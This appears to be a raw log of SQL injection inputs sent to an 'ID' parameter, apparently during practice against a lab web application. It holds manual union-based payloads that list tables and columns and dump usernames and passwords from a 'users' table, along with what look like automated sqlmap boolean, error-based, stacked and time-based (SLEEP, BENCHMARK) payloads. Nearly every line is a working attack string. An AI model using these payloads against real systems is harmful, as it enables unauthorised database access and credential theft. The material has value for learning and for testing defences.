ID:1
ID:1
ID:2
ID:3
ID:1'
ID:1'-- 
ID:1
ID:2
ID:1-- 
ID:1'-- 
ID:2'
ID:2'-- 
ID:1
ID:1'-- 
ID:1'-- 
ID:2'
ID:2'-- 
ID:1'-- 
ID:1'order by 3 -- 
ID:1' order by 9 -- 
ID:1' union select 1,2,3-- 
ID:1'union select  1,database(),version()-- 
ID:1'union select  1,database(),version()-- 
ID:-1'union select 1,database(),version()-- 
ID:2'-- 
ID:1' order by 3 -- 
ID:1'union select 1 ,2,3-- 
ID:-1'union select 1,2,3-- 
ID:1'union select 1,database(),version()-- 
ID:-1'union select 1,database(),version()-- 
ID:-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- 
ID:-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- 
ID:-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'-- 
ID:-1'union select 1,2,group_concat(username ,id , password) from users--  from information_schema.tables where table_schema='security'-- 
ID:-1' union select 1,2,group_concat(username ,id , password) from users-- 
ID:-1‘
ID:-1‘
ID:1-- 
ID:-1'union select 1,2,group_concat(username ,id , password) from users--  from information_schema.tables where table_schema='security'-- 
ID:-1'union select 1,2,group_concat(username ,id , password) from users--  from information_schema.tables where table_schema='security'-- 
ID:-1'union select 1,2,group_concat(username ,id , password) from users--  from information_schema.tables where table_schema='security'-- 
ID:1 and =1
ID:1 and =2
ID:1 and =2
ID:1 and 1=1
ID:1 and 1=2
ID:1 and 1=a
ID:1'-- 
ID:1'-- 
ID:1'
ID:1'-- 
ID:1'-- 
ID:1'-- 
ID:1'-- 
ID:1'-- 
ID:1'
ID:1'  
ID:1'__
ID:1'-- 
ID:1'-- 
ID:1'-- 
ID:
ID:1
ID:1'
ID:1 or 1-- 
ID:1' or 1-- 
ID:1 or 1-- 
ID:1
ID:1
ID:1
ID:7140
ID:1,,,')("),(
ID:1'FYahKx<'">TBnpHp
ID:1) AND 7149=3955 AND (1881=1881
ID:1) AND 5523=5523 AND (3088=3088
ID:1 AND 1130=7196
ID:1 AND 5523=5523
ID:1 AND 8413=4438-- Belc
ID:1 AND 5523=5523-- WhIq
ID:1') AND 1998=6650 AND ('HjyV'='HjyV
ID:1') AND 5523=5523 AND ('Bjli'='Bjli
ID:1' AND 8744=3114 AND 'sMFg'='sMFg
ID:1' AND 5523=5523 AND 'QiCs'='QiCs
ID:1' AND 2969=2091 AND 'OzKI'='OzKI
ID:(SELECT CONCAT(CONCAT(0x7170627171,(CASE WHEN (5451=5451) THEN 0x31 ELSE 0x30 END)),0x71716a6a71))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170627171,(SELECT (ELT(7195=7195,1))),0x71716a6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'eYwl'='eYwl
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170627171,(SELECT (ELT(2589=2589,1))),0x71716a6a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'KYXG'='KYXG
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7170627171,(SELECT (ELT(1708=1708,1))),0x71716a6a71,0x78))x)) AND 'TrUS'='TrUS
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7170627171,(SELECT (ELT(6792=6792,1))),0x71716a6a71,0x78))x)) AND 'wznB'='wznB
ID:1' AND GTID_SUBSET(CONCAT(0x7170627171,(SELECT (ELT(9733=9733,1))),0x71716a6a71),9733) AND 'xXCn'='xXCn
ID:(SELECT CONCAT(0x7170627171,(ELT(5599=5599,1)),0x71716a6a71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'vOND'='vOND
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))mPyg)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))fylI) AND 'UuLa'='UuLa
ID:1';SELECT BENCHMARK(5000000,MD5(0x45744752))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x4f614252)) AND 'hVGI'='hVGI
ID:1' AND (SELECT 4802 FROM (SELECT(SLEEP(5)))OwqJ) AND 'yjyL'='yjyL
ID:1' AND (SELECT 4802 FROM (SELECT(SLEEP(0)))OwqJ) AND 'yjyL'='yjyL
ID:1' AND (SELECT 4802 FROM (SELECT(SLEEP(5)))OwqJ) AND 'yjyL'='yjyL
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 2182-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x6e646f49684e46454c4f556246497a6a6e6d5373484161635a4d69506a7972616f5a415044564d6a,0x71716a6a71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,0x5561464c724b554755564765696b43537a55714e697348597454577a567a75694e6842524958796e,0x71716a6a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x7170627171,0x7a774a63514b44754466776f63584e5a494b68554b4c4a6543465470745861767545515073585348,0x71716a6a71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x43595045785374465368,0x71716a6a71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,0x5a4a7354636e75614d58,0x71716a6a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x7170627171,0x4c71766a546661434d51,0x71716a6a71),NULL,NULL-- -
ID:-7358' UNION ALL SELECT CONCAT(0x7170627171,0x4343596e69526e6159436753554d49545578756e4669744d7672794a6e4d5a4342664a4a6d4e7277,0x71716a6a71),NULL,NULL-- -
ID:-1968' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,0x4570556f784149466e51574a6f764472435847756e76744678547a7347584142564b72737062586f,0x71716a6a71)-- -
ID:-8017' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,(CASE WHEN (1715=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1715) THEN 1 ELSE 0 END),0x71716a6a71)-- -
ID:-2217' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x71716a6a71)-- -
ID:-2614' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x71716a6a71)-- -
ID:-8492' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x71716a6a71)-- -
ID:-3275' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x71716a6a71)-- -
ID:-6443' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x71716a6a71)-- -
ID:-5953' UNION ALL SELECT NULL,NULL,CONCAT(0x7170627171,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x71716a6a71)-- -
ID:1
ID:2
ID:2'
ID:1
ID:1'
ID:1'or1=1-- 
ID:1'or1=1-- '
ID:1'or1=1-- '
ID:1'or 1=1-- 
ID:1'order 1=1-- 
ID:1'order by 4-- 
ID:1'order by 3-- 
ID:1'order by 3-- 
ID:1
ID:1'
ID:1'
ID:1
ID:1
ID:1‘
ID:1
ID:1-- 
